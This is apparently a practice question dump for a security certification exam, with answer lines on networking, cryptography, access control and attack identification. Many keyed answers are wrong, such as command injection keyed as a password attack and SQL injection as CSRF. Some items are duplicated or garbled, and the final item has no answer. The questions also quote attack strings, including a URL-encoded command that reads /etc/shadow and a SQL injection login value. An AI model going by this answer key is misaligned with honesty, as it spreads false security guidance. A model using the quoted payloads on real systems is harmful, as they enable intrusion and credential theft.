A new intern in the purchasing department requires read access to shared documents. Permissions are normally controlled through a group called "Purchasing", however, the purchasing group permissions allow write access. Which of the following would be the BEST course of action? A. Modify all the shared files with read only permissions for the intern. B. Create a new group that has only read permissions for the files. C. Remove all permissions for the shared files. D. Add the intern to the "Purchasing" group.
B. Create a new group that has only read permissions for the files.
Which of the following encryption methods does PKI typically use to securely protect keys? A. Elliptic curve B. Digital signatures C. Asymmetric D. Obfuscation
B. Digital signatures
An organization has hired a penetration tester to test the security of its ten web servers. The penetration tester is able to gain root/administrative access in several servers by exploiting vulnerabilities associated with the implementation of SMTP, POP, DNS, FTP, Telnet, and IMAP. Which of the following recommendations should the penetration tester provide to the organization to better protect their web servers in the future? A. Use a honeypot B. Disable unnecessary services C. Implement transport layer security D. Increase application event logging
B. Disable unnecessary services
A company has been experiencing many successful email phishing attacks, which have been resulting in the compromise of multiple employees' accounts when employees reply with their credentials. The security administrator has been notifying each user and resetting the account passwords when accounts become compromised. Regardless of this process, the same accounts continue to be compromised even when the users do not respond to the phishing attacks. Which of the following are MOST likely to prevent similar account compromises? (Select TWO) A. Enforce password reuse limitations B. Enable password complexity C. Reset the account security questions D. Configure account lockout E. Implement time-of-day restrictions
B. Enable password complexity D. Configure account lockout
A security analyst finished drafting an official response to a security assessment report, which must be sent to the head of the auditing department. The security analyst needs to assure the head of the auditing department that the response came from the security analyst, and the contents of the response must be kept confidential. Which of the following are the LAST steps the security analyst should perform prior to electronically sending the message? (Select TWO) A. Hash the message B. Encrypt the message C. Digitally sign the message D. Label the email as "Confidential" E. Perform key exchange with the recipient
B. Encrypt the message C. Digitally sign the message
Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions infrastructure under its own domain infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources? A. Attestation B. Federation C. Single sign-on D. Kerberos
B. Federation
A security analyst is doing a vulnerability assessment on a database server. A scanning tool returns the following information: Database: CustomerAccess1 Columns: Password Data type: MD5 Hash Salted?: No.. There have been several security breaches on the web server that accesses this database. The security team is instructed to mitigate the impact of any possible breaches. The security team is also instructed to improve the security on this database by making it less vulnerable to offline attacks. Which of the following would BEST accomplish these goals? (Select TWO) A. Start using salts to generate MD5 password hashes B. Generate password hashes using SHA-256 C. Force users to change passwords the next time they log on D. Limit users to five attempted logons before they are locked out E. Require the web server to only use TLS 1.2 encryption
B. Generate password hashes using SHA-256 E. Require the web server to only use TLS 1.2 encryption
During a routine audit, it is discovered that someone has been using a stale administrator account to log into a seldom used server. The person has been using the server to view inappropriate websites that are prohibited to end users. Which of the following could best prevent this from occurring again? A. Credential management B. Group policy management C. Acceptable use policy D. Account expiration policy
B. Group policy management
Joe, a technician, is working remotely with his company provided laptop at the coffee shop near his home. Joe is concerned that another patron of the coffee shop may be trying to access his laptop. Which of the following is an appropriate control to use to prevent the other patron from accessing Joe's laptop directly? A. full-disk encryption B. Host-based firewall C. Current antivirus definitions D. Latest OS updates
B. Host-based firewall
While reviewing the monthly internet usage it is noted that there is a large spike in traffic classified as "unknown" and does not appear to be within the bounds of the organizations Acceptable Use Policy. Which of the following tool or technology would work BEST for obtaining more information on this traffic? A. Firewall logs B. IDS logs C. Increased spam filtering D. Protocol analyzer
B. IDS logs
The data backup window has expanded into the morning hours and has begun to affect production users. The main bottleneck in the process is the time it takes to replicate the backups to separate severs at the offsite data center. Which of the following uses of deduplication could be implemented to reduce the backup window? A. Implement deduplication at the network level between the two locations B. Implement deduplication on the storage array to reduce the amount of drive space needed C. Implement deduplication on the server storage to reduce the data backed up D. Implement deduplication on both the local and remote servers
B. Implement deduplication on the storage array to reduce the amount of drive space needed
Technicians working with servers hosted at the company's datacenter are increasingly complaining of electric shocks when touching metal items which have been linked to hard drive failures. Which of the following should be implemented to correct this issue? A. Decrease the room temperature B. Increase humidity in the room C. Utilize better hot/cold aisle configurations D. Implement EMI shielding
B. Increase humidity in the room
A penetration testing deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack? A. Domain hijacking B. Injection C. Buffer overflow D. Privilege escalation
B. Injection
A security analyst is hardening a server with the directory services role installed. The analyst must ensure LDAP traffic cannot be monitored or sniffed and maintains compatibility with LDAP clients. Which of the following should the analyst implement to meet these requirements? (Select TWO). A. Generate an X 509-complaint certificate that is signed by a trusted CA. B. Install and configure an SSH tunnel on the LDAP server. C. Ensure port 389 is open between the clients and the servers using the communication. D. Ensure port 636 is open between the clients and the servers using the communication. E. Remove the LDAP directory service role from the server.
B. Install and configure an SSH tunnel on the LDAP server. D. Ensure port 636 is open between the clients and the servers using the communication.
An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 PCs active on the network. The CISO suggests that the organization employ desktop imaging technology for such a large-scale upgrade. Which of the following is a security benefit of implementing an imaging solution? A. It allows for faster deployment B. It provides a consistent baseline C. It reduces the number of vulnerabilities D. It decreases the boot time
B. It provides a consistent baseline
A security analyst is hardening an authentication server. One of the primary requirements is to ensure there is mutual authentication and delegation. Given these requirements, which of the following technologies should the analyst recommend and configure? A. LDAP services B. Kerberos services C. NTLM services D. CHAP services
B. Kerberos services
Which of the following describes the maximum amount of time a mission essential function can operate without the systems it depends on before significantly impacting the organization? A. MTBF B. MTTR C. RTO D. RPO
B. MTTR
A software development company needs to share information between two remote servers, using encryption to protect it. A programmer suggests developing a new encryption protocol, arguing that using an unknown protocol with secure, existing cryptographic algorithm libraries will provide strong encryption without being susceptible to attacks on other known protocols. Which of the following summarizes the BEST response to the programmer's proposal? A. The newly developed protocol will only be as secure as the underlying cryptographic algorithms used. B. New protocols often introduce unexpected vulnerabilities, even when developed with otherwise secure and tested algorithm libraries. C. A programmer should have specialized training in protocol development before attempting to design a new encryption protocol. D. The obscurity value of unproven protocols against attacks often outweighs the potential for introducing new vulnerabilities.
B. New protocols often introduce unexpected vulnerabilities, even when developed with otherwise secure and tested algorithm libraries.
A company wants to ensure that the validity of publicly trusted certificates used by its web server can be determined even during an extended internet outage. Which of the following should be implemented? A. Recovery agent B. Ocsp C. Crl D. Key escrow
B. Ocsp
Which of the following are used to increase the computing time it takes to brute force a password using an offline attack? (Select TWO) A. XOR B. PBKDF2 C. Bcrypt D. HMAC E. RIPEMD
B. PBKDF2 C. Bcrypt
A Security engineer is configuring a system that requires the X 509 certificate information to be pasted into a form field in Base64 encoded format to import it into the system. Which of the following certificate formats should the engineer use to obtain the information in the required format? A. PFX B. PEM C. DER D. CER
B. PEM
A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed? A. Aggressive scan B. Passive scan C. Non-credentialed scan D. Compliance scan
B. Passive scan
An administrator discovers the following log entry on a server: Nov 12 2013 00:23:45 httpd[2342]: GET /app2/prod/proc/process.php input=change;cd%20../../../etc;cat%20shadow Which of the following attacks is being attempted? A. Command injection B. Password attack C. Buffer overflow D. Cross-site scripting
B. Password attack
A company hires a consulting firm to crawl its Active Directory network with a non-domain account looking for unpatched systems. Actively taking control of systems is out of scope, as is the creation of new administrator accounts. For which of the following is the company hiring the consulting firm? A. Vulnerability scanning B. Penetration testing C. Application fuzzing D. User permission
B. Penetration testing
A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host? A. Backdoor B. Pivoting C. Persistence D. Logic bomb
B. Pivoting
A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment? A. Trojan B. Polymorphic worm C. Rootkit D. Logic bomb E. Armored virus
B. Polymorphic worm
Which of the following types of keys is found in a key escrow? A. Public B. Private C. Shared D. Session
B. Private
Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1x client on their mobile devices? A. Shibboleth B. RADIUS federation C. SAML D. OAuth E. OpenlD connect
B. RADIUS federation
Which of the following characteristics differentiate a rainbow table attack from a brute force attack? (Select TWO). A. Rainbow table attacks greatly reduce compute cycles at attack time. B. Rainbow tables must include precompiled hashes. C. Rainbow table attacks do not require access to hashed passwords. D. Rainbow table attacks must be performed on the network. E. Rainbow table attacks bypass maximum failed login restrictions.
B. Rainbow tables must include precompiled hashes. E. Rainbow table attacks bypass maximum failed login restrictions.
A security engineer is faced with competing requirements from the networking group and database administrators. The database administrators would like ten application servers on the same subnet for ease of administration, whereas the networking group would like to segment all applications from one another. Which of the following should the security administrator do to rectify this issue? A. Recommend performing a security assessment on each application, and only segment the applications with the most vulnerability B. Recommend classifying each application into like security groups and segmenting the groups from one another C. Recommend segmenting each application, as it is the most secure approach D. Recommend that only applications with minimal security features should be segmented to protect them
B. Recommend classifying each application into like security groups and segmenting the groups from one another
A penetration tester is crawling a target website that is available to the public. Which of the following represents the actions the penetration tester is performing? A. URL hijacking B. Reconnaissance C. White box testing D. Escalation of privilege
B. Reconnaissance
A security administrator is reviewing the following firewall configuration after receiving reports that users are unable to connect to remote websites: 10 Permit From: ANY TO:ANY PORT:80, 20 PERMIT FROM:ANY TO:ANY PORT:443, 30 DENY FROM: ANY TO:ANY PORT:ANY. Which of the following is the MOST secure solution the security administrator can implement to fix this issue? A. Add the following rule to the firewall 5 PERMIT FROM:ANY TO:ANY PORT:53 B. Replace rule number 10 with the following rule 10 PERMIT FROM:ANY TO:ANY PORT:22 C. Insert the following rule in the firewall 25 PERMIT FROM:ANY TO:ANY PORTS:ANY D. Remove the following rule from the firewall 30 DENY FROM:ANY TO:ANY PORT:ANY
B. Replace rule number 10 with the following rule 10 PERMIT FROM:ANY TO:ANY PORT:22
Joe, an employee, wants to show his colleagues how much he knows about smartphones. Joe demonstrates a free movie application that he installed from a third party on his corporate smartphone. Joe's colleagues were unable to find the application in the app stores. Which of the following allowed Joe to install the application? (Select TWO). A. Near-field communication B. Rooting/jailbreaking C. Ad-hoc connections D. Tethering E. Sideloading
B. Rooting/jailbreaking E. Sideloading
Which of the following use the SSH protocol? (Choose two) A. Stelnet B. SCP C. SNMP D. FTPS E. SSL F. SFTP
B. SCP F. SFTP
As part of a corporate merger, two companies are combining resources. As a result, they must transfer files through the internet in a secure manner. Which of the following protocols would BEST meet this objective? (Select TWO) A. LDAPS B. SFTP C. HTTPS D. DNSSEC E. SRTP
B. SFTP C. HTTPS
A security consultant discovers that an organization is using the PCL protocol to print documents, utilizing the default driver and print settings. Which of the following is the MOST likely risk in this situation? A. An attacker can access and change the printer configuration. B. SNMP data leaving the printer will not be properly encrypted. C. An MITM attack can reveal sensitive information. D. An attacker can easily inject malicious code into the printer firmware. E. Attackers can use the PCL protocol to bypass the firewall of client computers.
B. SNMP data leaving the printer will not be properly encrypted.
A manager wants to distribute a report to several other managers within the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select three.) A. S/MIME B. SSH C. SNMPv3 D. FTPS E. SRTP F. HTTPS G. LDAPS
B. SSH D. FTPS F. HTTPS
A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart of a popular website, allowing the shopper to modify the price of an item at checkout. Which of the following BEST describes this type of user? A. Insider B. Script kiddie C. Competitor D. Hacktivist E. APT
B. Script kiddie
A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart of a popular website, allowing the shopper to modify the price of an item at checkout. Which of the following BEST describes this type of user? A. Insider B. Script kiddie C. Competitor D. Hacktivist E. APT
B. Script kiddie
A security administrator is developing training for corporate users on basic security principles for personal email accounts. Which of the following should be mentioned as the MOST secure way for password recovery? A. Utilizing a single Qfor password recovery B. Sending a PIN to a smartphone through text message C. Utilizing CAPTCHA to avoid brute force attacks D. Use a different e-mail address to recover password
B. Sending a PIN to a smartphone through text message
A security analyst is securing a CA server. One of the requirements is network isolation with no access to the internet or networked computers. Given this scenario, which of the following should the analyst implement to BEST address the requirement? A. Set up a firewall rule blocking ports 80 and 443 B. Set up an air-gapped environment C. Set up a router and configure an ACL D. Set up a segmented VLAN
B. Set up an air-gapped environment
When used together, which of the following qualify as two-factor authentication? A. Password and PIN B. Smart card and PIN C. Proximity card and smart card D. Fingerprint scanner and iris scanner
B. Smart card and PIN
Which of the following allows an auditor to test proprietary-software compiled code for security flaws? A. Fuzzing B. Static review C. Code signing D. Regression testing
B. Static review
When performing data acquisition on a workstation, which of the following should be captured based on memory volatility? (Select TWO). A. USB-attached hard disk B. Swap/pagefile C. Mounted network storage D. ROM E. RAM
B. Swap/pagefile E. RAM
A systems administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites? A. Extended domain validation B. TLS host certificate C. OCSP stapling D. Wildcard certificate
B. TLS host certificate
Users are able to reach the login page of their company website from home using HTTP. A network administrator disables HTTP and implements SSL. However, after the implementation, home users cannot access the login page of the company website. Which of the following is the MOST likely reason the site is unavailable? A. The users' browsers are not equipped for SSL B. The company website implements HTTP redirects C. The company firewall is blocking port 443 traffic D. The company web server is using an expired certificate
B. The company website implements HTTP redirects
A network administrator is downloading the latest software for the organization's core switch. The download page allows users to view the checksum values for the available files. The network administrator is shown the following when viewing the checksum values for the YB_16.swi file: [Checksum values for the downloaded file: MD5 d50b2b04cfb168eec8 SHA1 6a49065705a43de83dfa9e94 SHA256 7123fb644fbabdda6a73f6e6bc833e2cf12 After downloading the file, the network administrator runs a command to show the following output: Algorithm Hash path SHA256 5fdbbfb644fbadda000006e6bc833e2c968 C:\Users A. The downloaded file was only hashed with SHA-256 B. The downloaded file has been corrupted or tampered with C. The downloaded file should not be used because it was not hashed with MD5 D. The downloaded file should not be used because its hash differs from the hash of AA_15.swi
B. The downloaded file has been corrupted or tampered with
A user is attempting to view an older sent email, but is unable to open the email. Which of the following is the MOST likely cause? A. The email backup file was not properly imported following computer migration B. The private certificate used to sign the email has expired C. The email is protected by data loss prevention software D. The user has not authenticated to the email server
B. The private certificate used to sign the email has expired
Which of the following network vulnerability scan indicators BEST validates a successful, active scan? A. The scan job is scheduled to run during off-peak hours. B. The scan output lists SQL injection attack vectors. C. The scan data identifies the use of privileged-user credentials D. The scan results identify the hostname and IP address
B. The scan output lists SQL injection attack vectors.
A security analyst is reviewing the following output from an IPS: [**] [1:2467:7] EXPLOIT IGMP IGAP message overflow attempt[**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] 07/30-19:45:02.238185 250.19.18.71 ->250.19.18.22 IGMP TTL:255 TOS: 0x0 ID: 9742 IpLen:20 DgmLen: 502 MF Frag offset: 0x1FFF Frag Size: 0x01E2 [Xref=> http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-0367] Given this output, which of the following can be concluded? (Select TWO). A. The source IP of the attack is coming from 250.19 18.22. B. The source IP of the attack is coming from 250 19.18.71. C. The attacker sent a malformed IGAP packet, triggering the alert. D. The attacker sent a malformed TCP packet, triggering the alert. E. The TTL value is outside of the expected range, triggering the alert.
B. The source IP of the attack is coming from 250 19.18.71. C. The attacker sent a malformed IGAP packet, triggering the alert.
When considering IoT systems, which of the following represents the GREATEST ongoing risk after vulnerability has been discovered? A. Difficult-to-update firmware B. Tight integration to existing systems C. IP address exhaustion D. Not using industry standards
B. Tight integration to existing systems
A network operations manager has added a second row of server racks in the datacenter. These racks face the opposite direction of the first row of racks. Which of the following is the reason the manager installed the racks this way? A. To lower energy consumption by sharing power outlets B. To create environmental hot and cold isles C. To eliminate the potential for electromagnetic interference D. To maximize fire suppression capabilities
B. To create environmental hot and cold isles
Which of the following technologies would be MOST appropriate to utilize when testing a new software patch before a company-wide deployment? A. Cloud computing B. Virtualization C. Redundancy D. Application control
B. Virtualization
Which of the following would verify that a threat does exist and security controls can easily be bypassed without actively testing an application? A. Protocol analyzer B. Vulnerability scan C. Penetration test D. Port scanner
B. Vulnerability scan
An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router? A. WPA+CCMP B. WPA2+CCMP C. WPA+TWP D. WPA2+TWP
B. WPA2+CCMP
A security guard has informed the Chief Information Security Officer that a person with a tablet has been walking around the building. The guard also noticed strange white markings in different areas of the parking lot. The person is attempting which of the following types of attacks? A. Jamming B. War chalking C. Packet sniffing D. Near field communication
B. War chalking
When systems, hardware, or software are not supported by the original vendor, it is a vulnerability known as: A. system sprawl. B. end-of-life systems C. resource exhaustion D. a default configuration
B. end-of-life systems
A Security analyst is diagnosing an incident in which a system was compromised from an external IP address. The socket identified on the firewall was traced to 207.46.130.66. Which of the following should the security analyst do to determine if the compromised system still has an active connection? A. tracert B. netstat C. Ping D. nslookup
B. netstat
Which of the following penetration testing concepts is an attacker MOST interested in when placing the path of a malicious file in the windows/CurrentVersion/Run registry key? A. Persistence B. Pivoting C. Active reconnaissance D. Escalation of privilege
C. Active reconnaissance
When configuring settings in a mandatory access control environment, which of the following specifies the subjects that can access specific data objects? A. Owner B. System C. Administrator D. User
C. Administrator
A security analyst is monitoring the network and observes unusual traffic coming from a host on the LAN. Using a network monitoring tool, the analyst observes the following information: After ten seconds, some of the computers shown in the IP Dst field start to exhibit the same behavior and immediately make multiple outbound connection attempts. Based on this observed behavior, which of the following is the MOST likely cause? A. Users are running port scans on the network B. A malicious host is performing a MITM attack C. An amplified DDoS attack is in progress D. A worm is attacking the network E. A race condition is being leveraged
C. An amplified DDoS attack is in progress
Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices on their home networks? A. Power off the devices when they are not in use B. Prevent IoT devices from contacting the internet directly C. Apply firmware and software updates upon availability D. Deploy a bastion host on the home network
C. Apply firmware and software updates upon availability
Which of the following access management concepts is associated with file permissions? A. Authentication B. Accounting C. Authorization D. Identification
C. Authorization
Which of the following access management concepts is associated with file permissions? A. Authentication B. Accounting C. Authorization D. Identification
C. Authorization
A company has a data classification system with definitions for "Private" and public." The company's security policy outlines how data should be protected based on type. The company recently added the data type "Proprietary". Which of the following is the MOST likely reason the company added this data type? A. Reduced cost B. More searchable data C. Better data classification D. Expanded authority of the privacy officer
C. Better data classification
A security administrator must implement a system to ensure that invalid certificates are not used by a custom developed application. The system must be able to check the validity of certificates even when internet access is unavailable. Which of the following MUST be implemented to support this requirement? A. CSR B. OCSP C. CRL D. SSH
C. CRL
The chief Security Officer (CSO) has reported a rise in data loss but no break ins have occurred. By doing which of the following is the CSO most likely to reduce the number of incidents? A. Implement protected distribution B. Empty additional firewalls C. Conduct security awareness training D. Install perimeter barricades
C. Conduct security awareness training
During a lessons learned meeting regarding a previous incident , the security team receives a follow-up action item with the following requirements: Allow authentication from within the United States anytime Allow authentication if the user is accessing email or a shared file system Do not allow authentication if the AV program is two days out of date Do not allow authentication if the location of the device is in two specific countries Given the requirements, which of the following mobile deployment authentication types is being utilized? A. Geofencing authentication B. Two-factor authentication C. Context-aware authentication D. Biometric authentication
C. Context-aware authentication
During a lessons learned meeting regarding a previous incident, the security team receives a follow-up action item with the following requirements: Allow authentication from within the United States anytime. Allow authentication if the user is accessing email or a shared file system. Do not allow authentication if the AV program is two days out of date. Do not allow authentication if the location of the device is in two specific countries. Given the requirements, which of the following mobile deployment authentication types is being utilized? A. Geofencing authentication B. Two-factor authentication C. Context-aware authentication D. Biometric authentication
C. Context-aware authentication
Logs from an IDS alerted on a string entered into the company's website login page. The following line was pulled from the HTTP POST request. userid=bob' and 1='1&request=Submit Which of the following was attempted? A. Reflected XSS B. Stored XSS C. Cross-site request forgery D. SQL injection
C. Cross-site request forgery
A web application is configured to target browsers and allow access to bank accounts to siphon money to a foreign account. This is an example of which of the following attacks? A. SQL injection B. Header manipulation C. Cross-site scripting D. Flash cookie exploitation
C. Cross-site scripting
An employee is having issues when attempting to access files on a laptop. The machine was previously running slow, and many files were not accessible. The employee is not able to access the hard drive the next day, and all file names were changed to some random names. Which of the following BEST represents what compromised the machine? A. Ransomware B. Worm C. Crypt-malware D. RAT
C. Crypt-malware
After a merger between two companies a security analyst has been asked to ensure that the organization's systems are secured against infiltration by any former employees that were terminated during the transition. Which of the following actions are MOST appropriate to harden applications against infiltration by former employees? (Select TWO) A. Monitor VPN client access B. Reduce failed login out settings C. Develop and implement updated access control policies D. Review and address invalid login attempts E. Increase password complexity requirements F. Assess and eliminate inactive accounts
C. Develop and implement updated access control policies F. Assess and eliminate inactive accounts
A system administrator is configuring a site-to-site VPN tunnel. Which of the following should be configured on the VPN concentrator during the IKE phase? A. RIPEMD B. ECDHE C. Diffie-Hellman D. HTTPS
C. Diffie-Hellman
A technician has installed an new AAA server, which will be used by the network team to control access to a company's routers and switches. The technician completes the configuration by adding the network team members to the NETWORK_TEAM group, and then adding the NETWORK_TEAM group to the appropriate ALLOW_ACCESS access list. Only members of the network team should have access to the company's routers and switches. [Network_Team: Lee, Andrea, Pete] [Allow Access: Domain_users, Authenticated_users, Network_team] Members of the network team ability to log on to various network devices configured to use the AAA server. Weeks later, an auditor asks to review the following access log sample: [5/26/2017 10:20 PERMIT: LEE] [5/27/2017 13:45 PERMIT: ANDREA] [5/27/2017 09:12 PERMIT: LEE] [5/28/2017 16:37 PERMIT: JOHN] [5/29/2017 08:53 PERMIT: LEE] Which of the following should the auditor recommend based on the above information? A. Configure the ALLOW_ACCESS group logic to use AND rather than OR B. Move the NETWORK_TEAM group to the top of the ALLOW_ACCESS access list C. Disable groups nesting for the ALLOW_ACCESS group in the AAA server D. Remove the DOMAIN_USERS group from the ALLOW_ACCESS group
C. Disable groups nesting for the ALLOW_ACCESS group in the AAA server
A security administrator has been tasked with improving the overall security posture related to desktop machines on the network. An auditor has recently that several machines with confidential customer information displayed in the screens are left unattended during the course of the day. Which of the following could the security administrator implement to reduce the risk associated with the finding? A. Implement a clean desk policy B. Security training to prevent shoulder surfing C. Enable group policy based screensaver timeouts D. Install privacy screens on monitors
C. Enable group policy based screensaver timeouts
An organization is using a tool to perform a source code review. Which of the following describes the case in which the tool incorrectly identifies the vulnerability? A. False negative B. True negative C. False positive D. True positive
C. False positive
Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of physical servers. Which of the following is the BEST method for Joe to use? A. Differential B. Incremental C. Full D. Snapshots
C. Full
Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of physical servers. Which of the following is the BEST method for Joe to use? A. Differential B. Incremental C. Full D. Snapshots
C. Full
An application team is performing a load-balancing test for a critical application during off- hours and has requested access to the load balancer to review. Which servers are up without having the administrator on call. The security analyst is hesitant to give the application team full access due to other critical applications running on the road balancer. Which of the following is the BEST solution for the security analyst to process the request? A. Give the following allowed Joe to install the ap off hours B. Disable other critical applications before granting the team access. C. Give the application team read-only access D. Share the account with the application team
C. Give the application team read-only access
A developer wants to use an open source, third-party plug-in. The developer downloads the plug-in from the providers website and from a mirror, and runs the files through and integrity-checking hash. The output of each file is shown : fileA: BA411C782AD521740123456789ABCDEF fileB: BA411C782AD521740123456789ABCDEF Which of the following statements BEST summarizes what conclusion the developer can draw from the above results? A. The files have both been compromised because the numeric and letter sequence indicates an error. B. The integrity checksum is MD5 and cannot be assumed reliable C. Given the output, the developer can assume there is no integrity compromise D. The MD5 and SHA-1 checksums match, so the files have not been compromised
C. Given the output, the developer can assume there is no integrity compromise
An organization electronically processes sensitive data within a controlled facility. The CISO wants to limit signal from leave the facility. Which of the following mitigates this risk? A. Upgrading facility cabling to a higher standard of protected cabling to reduce the likelihood of emission spillage B. Hardening the facility through the use of secure cabinetry to block emissions C. Hardening the facility with a Faraday cage to contain emissions produced from data processing D. Employing security guards to ensure unauthorized personnel remain outside of the facility
C. Hardening the facility with a Faraday cage to contain emissions produced from data processing
A security administrator has been assigned to review the security posture of the standard corporate system image for virtual machines. The security administrator conducts a thorough review of the system logs, installation procedures, and network configuration of the VM image. Upon reviewing the access logs and user accounts, the security administrator determines that several accounts will not be used in production. Which of the following would correct the deficiencies? A. Mandatory access controls B. Disable remote login C. Host hardening D. Disabling services
C. Host hardening
An organization wants to ensure network access is granted only after a user or device has been authenticated. Which of the following should be used to achieve this objective for both wired and wireless networks? A. CCMP B. PKCS#12 C. IEEE 802.1x D. OCSP
C. IEEE 802.1x
An attacker wearing a building maintenance uniform approached a company's receptionist asking for access to a secure area. The receptionist asks for identification, a building access badge and checks the company's list approved maintenance personnel prior to granting physical access to the secure are. The controls used by the receptionist are in place to prevent which of the following types of attacks? A. Tailgating B. Shoulder surfing C. Impersonation D. Hoax
C. Impersonation
A company is deploying a file-sharing protocol across a network and needs to select a protocol for authenticating clients. Management requests that the service be configured in the most secure way possible. The protocol must also be capable of mutual authentication, and support SSO and smart card logons. Which of the following would BEST accomplish the task? A. Store credentials in LDAP B. Use NTLM authentication C. Implement Kerberos D. Use MSCHAP authentication
C. Implement Kerberos
A company is deploying a file-sharing protocol across a network and needs to select a protocol for authenticating clients. Management requests that the service be configured in the most secure way possible. The protocol must also be capable of mutual authentication, and support SSO and smart card logons. Which of the following would BEST accomplish this task? A. Store credentials in LDAP B. Use NTLM authentication C. Implement Kerberos D. User MSCHAP authentication
C. Implement Kerberos
An organization finds that most help desk calls are regarding account lockout due to a variety of applications running on different systems. Management is looking for a solution to reduce the number of account lockouts while improving security. Which of the following is the BEST solution for this organization? A. Create multiple application accounts for each user. B. Provide secure tokens. C. Implement SSO. D. Utilize role-based access control
C. Implement SSO.
The security administrator receives an email on a non-company account from a coworker stating that some reports are not exporting correctly. Attached to the email was an example report file with several customers' names and credit card numbers with the PIN. Which of the following is the BEST technical controls that will help mitigate this risk of disclosing sensitive data? A. Configure the mail server to require TLS connections for every email to ensure all transport data is encrypted B. Create a user training program to identify the correct use of email and perform regular audits to ensure compliance C. Implement a DLP solution on the email gateway to scan email and remove sensitive data or files D. Classify all data according to its sensitivity and inform the users of data that is prohibited to share
C. Implement a DLP solution on the email gateway to scan email and remove sensitive data or files
A bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. In addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future? A. Deploy multiple web servers and implement a load balancer B. Increase the capacity of the perimeter router to 10Gbps C. Implement a forwarding proxy and URL filtering for the organization's applications D. Implement an active/passive high availability solution
C. Implement a forwarding proxy and URL filtering for the organization's applications
During an assessment of a manufacturing plant, a security analyst finds several end-of-life programmable logic controllers, which have firmware that was last updated three years ago and known vulnerabilities. Which of the following BEST mitigates the risks associated with the PLC's? A. Deploy HIDS on each device B. Remove the PLC's from the manufacturing infrastructure C. Implement network segmentation to isolate the devices D. Perform file integrity monitoring against the devices
C. Implement network segmentation to isolate the devices
An organization's file server has been virtualized to reduce costs. Which of the following types of backups would be MOST appropriate for the particular file server? A. Snapshot B. Full C. Incremental D. Differential
C. Incremental
Which of the following BEST describes a routine in which semicolons, dashes, quotes, and commas are removed from a string? A. Error handling to protect against program exploitation B. Exception handling to protect against XSRF attacks C. Input validation to protect against SQL injection D. Padding to protect against string buffer overflows
C. Input validation to protect against SQL injection
A computer on a company network was infected with a zero-day exploit after an employee accidently opened an email that contained malicious content. The employee recognized the email as malicious and was attempting to delete it, but accidently opened it. Which of the following should be done to prevent this scenario from occurring again in the future? A. Install host-based firewalls on all computers that have an email client installed B. Set the email program default to open messages in plain text C. Install end-point protection on all computers that access web email D. Create new email spam filters to delete all messages from that sender
C. Install end-point protection on all computers that access web email
A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of types of scans MOST likely caused the outage? A. Non-intrusive credentialed scan B. Non-intrusive non-credentialed scan C. Intrusive credentialed scan D. Intrusive non-credentialed scan
C. Intrusive credentialed scan
A botnet has hit a popular website with a massive number of GRE-encapsulated packets to perform a DDoS attack News outlets discover a certain type of refrigerator was exploited and used to send outbound packets to the website that crashed. To which of the following categories does the refrigerator belong? A. SoC B. ICS C. IoT D. MFD
C. IoT
A network administrator receives a support ticket from the security operations team to implement secure access to the domain. The support contains the following information: Source: 192.168.1.137 Destination: 10.113.10.8 Protocol: TCP Ports: 636 Time-of-day restriction: None Proxy bypass required: Yes Which of the following is being requested to be implemented? A. DNSSEC B. S/MIME C. LDAPS D. RDP
C. LDAPS
Which of the following is the LEAST secure hashing algorithm? A. SHA1 B. RIPEMD C. MD5 D. DES
C. MD5
Which of the following is used to validate the integrity of data? A. CBC B. Blowfish C. MD5 D. RSA
C. MD5
A network administrator is attempting to troubleshoot an issue regarding certificates on a secure website. During the troubleshooting process, the network administrator notices that the web gateway proxy on the local network has signed all of the certificates on the local machine. Which of the following describes the type of attack the proxy has been legitimately programmed to perform? A. Transitive access B. Spoofing C. Man-in-the-middle D. Replay
C. Man-in-the-middle
An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability? A. Faraday cage B. Air gap C. Mantrap D. Bollards
C. Mantrap
Ann a security analyst is monitoring the IDS console and noticed multiple connections from an internal host to a suspicious call back domain \. Which of the following tools would aid her to decipher the network traffic? A. Vulnerability Scanner B. NMAP C. NETSTAT D. Packet Analyzer
C. NETSTAT
Which of the following are considered among the BEST indicators that a received message is a hoax? (Select TWO) A. Minimal use of uppercase letters in the message B. Warnings of monetary loss to the receiver C. No valid digital signature from a known security organization D. Claims of possible damage to computer hardware E. Embedded URLs
C. No valid digital signature from a known security organization E. Embedded URLs
A business has recently deployed laptops to all sales employees. The laptops will be used primarily from home offices and while traveling, and a high amount of wireless mobile use is expected. To protect the laptops while connected to untrusted wireless networks, which of the following would be the BEST method for reducing the risk of having the laptops compromised? A. MAC filtering B. Virtualization C. OS hardening D. Application white-listing
